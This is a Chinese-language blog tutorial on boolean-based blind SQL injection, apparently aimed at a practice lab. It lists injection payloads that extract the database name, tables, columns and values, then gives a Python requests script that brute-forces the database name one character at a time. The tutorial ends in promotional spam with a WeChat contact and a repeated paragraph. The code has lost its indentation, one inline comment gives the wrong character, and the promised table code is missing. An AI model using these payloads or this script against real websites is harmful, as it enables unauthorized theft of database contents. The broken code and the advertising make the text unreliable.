判断数据库名长度
/?id=1’ and length((select database()))=8–+
挨个判断数据库名
/?id=1’ and ascii(substr((select database()),1,1))=115–+
第一位为’s’
/?id=1’ and ascii(substr((select database()),2,1))=102–+
第二位为’e’
…
判断表名
/?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102–+
判断字段名
/?id=1’ and ascii(substr((select column_name from information_schema.columns where table_name=‘表名’ limit 1,1),1,1))=102–+
判断值
/?id=1’ and ascii(substr((select 字段 from 表 limit 1,1),1,1))=1–+
python脚本自动化
可以看到手注需要一个一个试工作量是非常非常巨大的,这时候一个python脚本就可以很好的解放我们的双手:
需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…":
import requests
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False
flag = ‘You are in…’
获取数据库相关信息:
def GetDBName(url):
DBName = ‘’
print(“开始获取数据库名长度…”)
len = 0
for l in range(1,99):
payload = f"’ and length((select database()))={l}–+"
res = conn.get(url=url+payload)
if flag in res.content.decode(“utf-8”):
print(“数据库名长度为:”+str(l))
len = l
break
print(“开始获取数据库名…”)
for i in range(1, len+1):
for j in range(33,127):
payload = f"’ and ascii(substr((select database()),{i},1))={j}–+"
res = conn.get(url=url+payload)
if flag in res.content.decode(“utf-8”):
DBName += chr(j)
print(DBName)
break
return DBName
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。运行结果如下所示:
接下来就是获取表、字段以及其中的具体数据了,写下去你会发现总体流程都是一样的,以表为例,大致步骤如下:
获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名
代码如下:
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
学习路线:
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
[外链图片转存中…(img-NZMRQ6rO-1712712164156)]